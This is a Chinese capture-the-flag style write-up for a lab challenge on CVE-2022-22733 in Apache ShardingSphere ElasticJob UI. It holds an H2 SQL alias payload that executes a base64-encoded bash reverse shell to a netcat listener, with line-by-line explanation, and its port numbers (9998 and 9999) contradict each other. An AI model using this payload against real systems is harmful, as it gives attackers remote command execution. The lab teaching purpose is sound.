【春秋云镜】CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞解题思路

作者：AllinToyou | 2024-05-16 15:07:22

踩

反向shell：

反向 Shell 经常被用于构造恶意数据执行权限绕过攻击。在网络安全领域，反向 Shell 是一种常见的技术，它允许攻击者从远程位置控制一个受害系统。这种技术通常用于绕过防火墙或其他网络安全措施，因为它是从受害者的系统向攻击者的控制端发起连接，而不是传统的直接攻击方式（攻击者直接连接到受害者系统）。由于许多防火墙和安全系统配置为允许出站连接而阻止未经请求的入站连接，反向 Shell 可以有效绕过这些安全措施。

在权限绕过攻击中，攻击者首先需要找到一种方式将恶意代码（如反向 Shell 脚本）注入到目标系统中。这可以通过多种方式实现，包括但不限于：利用软件漏洞、钓鱼攻击、或者社会工程学技巧。一旦恶意代码被执行，它会尝试建立一个连接回攻击者指定的服务器或机器上的监听端口。

这种攻击方式的危险之处在于，它允许攻击者远程执行命令，获取敏感信息，甚至可能升级权限来获取对整个系统的控制。这就是为什么反向 Shell 是黑帽黑客和网络攻击者常用的工具之一。

启用NC监听端口，由于我这边在本机nc监听端口和web端口需要不一样，一个9998一个9999

本地启用web网站，用啥都行，我这边是http://127.0.0.1:9999，本地NC监听9998端口**（地址端口不唯一，我这边靶场是公网环境，所以内网机器要开通映射放出去，需根据具体情况更改）**，在网站根目录下构造恶意SQL代码，保存后缀为.sql的文件：

CREATE ALIAS EXEC AS ‘String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return “123”;}’;CALL EXEC (‘bash -c {echo,xxxxxxxxxxxxxxxxxxx}|{base64,-d}|{bash,-i}’)
注意：xxxxxxxxxxxxxxxxxxx要换成“bash -i >& /dev/tcp/127.0.0.1/9998 0>&1”的base编码，随便你找个工具encode下，127.0.0.1/9998是我的nc监听回显端口

①CREATE ALIAS EXEC AS ‘String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return “123”;}’;CALL EXEC (‘bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}’)

这段 SQL 代码是针对 H2 数据库的，并且它试图在数据库中执行 Java 代码以创建一个外部进程。具体分析如下：

CREATE ALIAS EXEC AS ...：这条语句创建了一个名为 EXEC 的别名，其背后的 Java 方法允许执行外部命令。这个 Java 方法定义了一个名为 shellexec 的函数，该函数接受一个字符串参数 cmd（代表要执行的命令），使用 Runtime.getRuntime().exec(cmd); 执行该命令，然后返回字符串 “123”。这种方式可以让 SQL 调用操作系统级的命令，增加了安全风险。
CALL EXEC ('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}')：这是一个调用 EXEC 函数的 SQL 命令，执行一个复合的 bash 命令。这个命令做了以下几步：

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OCAwPiYx：这部分使用 echo 输出一个 Base64 编码的字符串。
base64 -d：这部分将上一步的输出解码。解码的内容是一个 bash 命令：bash -i >& /dev/tcp/127.0.0.1/9998 0>&1，这条命令尝试创建一个反向 shell，连接到本地机器的 9998 端口**（这就是前边我NC监听用的是9998需要同步起来，反弹shell是要在你监听的端口回显的）**。
bash -i：这部分指示 bash 以交互模式执行解码后的命令。

整体而言，这段代码的目的是通过 H2 数据库执行一个反向 shell，尝试与本地机器的 9999 端口建立连接，并允许执行进一步的命令。这是一种安全攻击技术，用于在已经受到攻击的系统中深入执行恶意操作。

②bash -i >& /dev/tcp/127.0.0.1/9998 0>&1

这行命令是在使用 Bash shell 创建一个反向 shell，向目标主机和端口建立 TCP 连接，并且将 Bash shell 的输入输出重定向到这个连接中。具体来说，这行命令的各个部分意味着：

bash -i：启动 Bash 并使其运行在交互模式下，这样可以执行命令并接收输入。
>&：这是重定向操作符，用于将标准输出（STDOUT）重定向到其他位置。
/dev/tcp/127.0.0.1/9998：这是一个特殊的文件路径，利用 Bash 的内置功能来创建 TCP 连接。这里的 127.0.0.1 是本地回环地址，表示本机，9999 是目标端口号。
0>&1：将标准输入（STDIN）重定向到标准输出（STDOUT）。这意味着来自 TCP 连接的输入（例如远程命令）将被 Bash 进程读取并执行。

简单来说，这行命令的作用是在本机（127.0.0.1）的9999端口上创建一个反向 shell，允许通过这个端口远程执行 Bash 命令。这通常用于网络渗透测试或者当系统已经被侵入时，攻击者希望保持对系统的控制。